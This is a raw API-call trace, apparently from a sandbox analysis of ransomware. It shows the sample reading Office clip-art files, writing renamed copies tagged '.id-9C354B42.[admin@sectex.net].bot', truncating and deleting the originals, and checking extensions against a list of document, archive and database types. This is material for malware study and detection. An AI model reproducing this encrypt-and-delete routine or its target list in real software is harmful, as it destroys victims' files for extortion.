	[0145.931] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.931] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.931] GetLastError () returned 0x0
	[0145.931] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2168, lpOverlapped=0x0) returned 1
	[0145.951] WriteFile (in: hFile=0x3a4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2170, lpOverlapped=0x0) returned 1
	[0145.952] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.952] WriteFile (in: hFile=0x3a4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.952] SetEndOfFile (hFile=0x3a4) returned 1
	[0145.952] CloseHandle (hObject=0x3a4) returned 1
	[0145.952] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.952] SetEndOfFile (hFile=0x384) returned 1
	[0145.954] CloseHandle (hObject=0x384) returned 1
	[0145.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.955] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00369_.wmf")) returned 1
	[0145.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.955] lstrlenW (lpString=".doc") returned 4
	[0145.955] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.955] lstrlenW (lpString=".docx") returned 5
	[0145.955] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.955] lstrlenW (lpString=".pdf") returned 4
	[0145.955] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.955] lstrlenW (lpString=".xls") returned 4
	[0145.955] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.955] lstrlenW (lpString=".xlsx") returned 5
	[0145.955] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.955] lstrlenW (lpString=".ppt") returned 4
	[0145.956] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.956] lstrlenW (lpString=".zip") returned 4
	[0145.956] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.956] lstrlenW (lpString=".rar") returned 4
	[0145.956] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString=".bz2") returned 4
	[0145.956] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString=".7z") returned 3
	[0145.956] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.956] lstrlenW (lpString=".dbf") returned 4
	[0145.956] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.956] lstrlenW (lpString=".1cd") returned 4
	[0145.956] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.956] lstrlenW (lpString=".jpg") returned 4
	[0145.956] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.956] lstrlenW (lpString=".doc") returned 4
	[0145.956] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString=".docx") returned 5
	[0145.956] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.956] lstrlenW (lpString=".pdf") returned 4
	[0145.956] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.956] lstrlenW (lpString=".xls") returned 4
	[0145.956] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.956] lstrlenW (lpString=".xlsx") returned 5
	[0145.956] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.956] lstrlenW (lpString=".ppt") returned 4
	[0145.956] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.957] lstrlenW (lpString=".zip") returned 4
	[0145.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.957] lstrlenW (lpString=".rar") returned 4
	[0145.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.957] lstrlenW (lpString=".bz2") returned 4
	[0145.957] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.957] lstrlenW (lpString=".7z") returned 3
	[0145.957] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.957] lstrlenW (lpString=".dbf") returned 4
	[0145.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.957] lstrlenW (lpString=".1cd") returned 4
	[0145.957] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00369_.WMF") returned 63
	[0145.957] lstrlenW (lpString=".jpg") returned 4
	[0145.957] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.957] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.957] lstrlenW (lpString="FD00397_.WMF") returned 12
	[0145.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0145.958] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=10816) returned 1
	[0145.958] CloseHandle (hObject=0x384) returned 1
	[0145.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf")) returned 0x20
	[0145.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0145.958] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.958] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0145.959] GetLastError () returned 0x0
	[0145.959] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2a40, lpOverlapped=0x0) returned 1
	[0145.971] WriteFile (in: hFile=0x3a4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2a50, lpOverlapped=0x0) returned 1
	[0145.972] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.972] WriteFile (in: hFile=0x3a4, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.972] SetEndOfFile (hFile=0x3a4) returned 1
	[0146.297] CloseHandle (hObject=0x3a4) returned 1
	[0146.430] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.431] SetEndOfFile (hFile=0x384) returned 1
	[0146.650] CloseHandle (hObject=0x384) returned 1
	[0146.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.651] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf")) returned 1
	[0146.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.651] lstrlenW (lpString=".doc") returned 4
	[0146.652] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString=".docx") returned 5
	[0146.652] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.652] lstrlenW (lpString=".pdf") returned 4
	[0146.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString=".xls") returned 4
	[0146.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.652] lstrlenW (lpString=".xlsx") returned 5
	[0146.652] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.652] lstrlenW (lpString=".ppt") returned 4
	[0146.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.652] lstrlenW (lpString=".zip") returned 4
	[0146.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.652] lstrlenW (lpString=".rar") returned 4
	[0146.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString=".bz2") returned 4
	[0146.652] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString=".7z") returned 3
	[0146.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.652] lstrlenW (lpString=".dbf") returned 4
	[0146.652] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.652] lstrlenW (lpString=".1cd") returned 4
	[0146.652] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.652] lstrlenW (lpString=".jpg") returned 4
	[0146.652] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.653] lstrlenW (lpString=".doc") returned 4
	[0146.653] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString=".docx") returned 5
	[0146.653] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.653] lstrlenW (lpString=".pdf") returned 4
	[0146.653] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString=".xls") returned 4
	[0146.653] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.653] lstrlenW (lpString=".xlsx") returned 5
	[0146.653] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.653] lstrlenW (lpString=".ppt") returned 4
	[0146.653] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.653] lstrlenW (lpString=".zip") returned 4
	[0146.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.653] lstrlenW (lpString=".rar") returned 4
	[0146.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString=".bz2") returned 4
	[0146.653] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString=".7z") returned 3
	[0146.653] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.653] lstrlenW (lpString=".dbf") returned 4
	[0146.653] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.653] lstrlenW (lpString=".1cd") returned 4
	[0146.653] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.653] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63
	[0146.653] lstrlenW (lpString=".jpg") returned 4
	[0146.653] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.654] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.654] lstrlenW (lpString="FD00775_.WMF") returned 12
	[0146.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.654] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=11152) returned 1
	[0146.654] CloseHandle (hObject=0x384) returned 1
	[0146.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf")) returned 0x20
	[0146.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.655] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.655] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0146.655] GetLastError () returned 0x0
	[0146.655] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2b90, lpOverlapped=0x0) returned 1
	[0146.657] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2ba0, lpOverlapped=0x0) returned 1
	[0146.658] ReadFile (in: hFile=0x384, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.658] WriteFile (in: hFile=0x3c8, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.658] SetEndOfFile (hFile=0x3c8) returned 1
	[0146.658] CloseHandle (hObject=0x3c8) returned 1
	[0146.658] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.658] SetEndOfFile (hFile=0x384) returned 1
	[0146.661] CloseHandle (hObject=0x384) returned 1
	[0146.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.661] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00775_.wmf")) returned 1
	[0146.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.662] lstrlenW (lpString=".doc") returned 4
	[0146.662] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString=".docx") returned 5
	[0146.662] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.662] lstrlenW (lpString=".pdf") returned 4
	[0146.662] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString=".xls") returned 4
	[0146.662] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.662] lstrlenW (lpString=".xlsx") returned 5
	[0146.662] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.662] lstrlenW (lpString=".ppt") returned 4
	[0146.662] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.662] lstrlenW (lpString=".zip") returned 4
	[0146.662] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.662] lstrlenW (lpString=".rar") returned 4
	[0146.662] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString=".bz2") returned 4
	[0146.662] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString=".7z") returned 3
	[0146.662] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.662] lstrlenW (lpString=".dbf") returned 4
	[0146.662] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.662] lstrlenW (lpString=".1cd") returned 4
	[0146.662] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.662] lstrlenW (lpString=".jpg") returned 4
	[0146.662] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.663] lstrlenW (lpString=".doc") returned 4
	[0146.663] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString=".docx") returned 5
	[0146.663] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.663] lstrlenW (lpString=".pdf") returned 4
	[0146.663] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString=".xls") returned 4
	[0146.663] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.663] lstrlenW (lpString=".xlsx") returned 5
	[0146.663] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.663] lstrlenW (lpString=".ppt") returned 4
	[0146.663] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.663] lstrlenW (lpString=".zip") returned 4
	[0146.663] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.663] lstrlenW (lpString=".rar") returned 4
	[0146.663] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString=".bz2") returned 4
	[0146.663] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString=".7z") returned 3
	[0146.663] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.663] lstrlenW (lpString=".dbf") returned 4
	[0146.663] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.664] lstrlenW (lpString=".1cd") returned 4
	[0146.664] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00775_.WMF") returned 63
	[0146.664] lstrlenW (lpString=".jpg") returned 4
	[0146.664] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.664] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.664] lstrlenW (lpString="FD00779_.WMF") returned 12
	[0146.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.665] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9010) returned 1
	[0146.665] CloseHandle (hObject=0x384) returned 1
	[0146.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf")) returned 0x20
	[0146.665] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0146.666] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.666] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
